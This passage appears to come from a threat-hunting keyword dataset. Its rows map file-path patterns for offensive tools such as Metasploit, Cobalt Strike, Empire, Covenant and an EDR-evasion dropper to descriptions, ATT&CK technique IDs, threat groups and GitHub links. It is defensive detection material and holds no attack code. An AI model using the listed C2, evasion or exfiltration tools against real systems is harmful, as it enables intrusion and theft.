test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Egress-Assess*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/elevateit.bat*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*/ElevateKit/elevate.*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*/elf/dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/elf/exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ELFLoader/*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/Elite/Elite*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/email_spoof_checks.txt*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,0,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*/EmailAll.git*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*/emailall.py*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*/EmbedInHTML.git*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*/EmbedInHTML/*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*/emotet.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Empire.git,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/empire/client/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/empire:latest*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*/EmpireProject*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,1,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*/enable-user.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/enableuser/enableuser.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/enableuser/enableuser.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/enc_shellcode.bin*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*/enc_shellcode.h*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*/enip-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/enum__secrets/*.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/enum_av.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_av.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/enum_cisco.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_domain_info*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/enum_f5.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_juniper.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_osx.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_proxy.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_services.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_shares.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/enum_snmp.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/EnumCLR.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*/enumerate.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 